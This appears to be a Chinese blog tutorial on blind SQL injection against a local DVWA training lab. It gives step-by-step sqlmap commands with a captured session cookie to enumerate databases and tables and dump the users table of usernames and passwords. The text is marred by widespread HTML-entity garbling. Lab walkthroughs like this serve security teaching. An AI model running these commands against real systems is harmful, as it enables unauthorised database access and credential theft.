mysql注入爆库_DVWA下的盲注SQLmap工具注入

LOW难度&＃xff01;&＃xff01;&＃xff01;

所需工具&＃xff1a; DVWA环境、抓包工具、sqlmap

抓包工具用fiddler为例。

&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;&＃61;

先进入DVWA调整模式为LOW

打开抓包工具&＃xff0c;确定可以抓到http流量包

DVWA下选择SQL盲注&＃xff0c;随意输入一个USER ID后回车

会看到回显&＃xff0c;用户ID存在

复制该网页链接&＃xff0c;保存到记事本&＃xff0c;等下sqlmap用

用抓包工具获取本次提交的网页数据包里的COOKIE值

复制该COOKIE保存到记事本&＃xff0c;等下sqlmap用

打开sqlmap&＃xff0c;查找注入点

输入命令&＃xff1a;

-u       指定URL

--COOKIE     带COOKIE注入

python sqlmap.py-u "localhost/dvwa/vulnerabilities/sqli_blind

id&＃61;2&Submit&＃61;Submit"--COOKIE&＃61;"PHPSESSID&＃61;jsqauesftt001qeq4jmb1brq95;security&＃61;low"

过程中出现提示默认回车即可。

得到结果&＃xff1a;注入点可能是ID&＃xff0c;数据库为Mysql

爆库&＃xff1a;

--dbs     发现所有数据库 (参数前有空格)

python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blind/?

id&＃61;2&Submit&＃61;Submit"--COOKIE&＃61;"PHPSESSID&＃61;jsqauesftt001qeq4jmb1brq95;security&＃61;low"--dbs

列出数据库&＃xff1a;

--tables    列出数据库表  (参数前有空格)

-D            选择数据库

python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blind/?id&＃61;2&Submit&＃61;Submit"--COOKIE&＃61;"PHPSESSID&＃61;jsqauesftt001qeq4jmb1brq95;security&＃61;low"--tables -D dvwa

查看列出的数据库表&＃xff1a;

列出users表的所有字段

&＃xfffd;Ccolumns -T “users” (columns参数前带空格)

python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blind/?id&＃61;2&Submit&＃61;Submit"--COOKIE&＃61;"PHPSESSID&＃61;jsqauesftt001qeq4jmb1brq95;security&＃61;low"--columns -T users

可以看到字段

把users表直接存到本地

-T users --dump

python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blind/?id&＃61;2&Submit&＃61;Submit"--COOKIE&＃61;"PHPSESSID&＃61;jsqauesftt001qeq4jmb1brq95;security&＃61;low" -T users --dump

打开下载的文件即可看到用户名&＃xff0c;密码

最后结果&＃xff1a;

欢迎各位大神指点批评&＃xff01;

晨风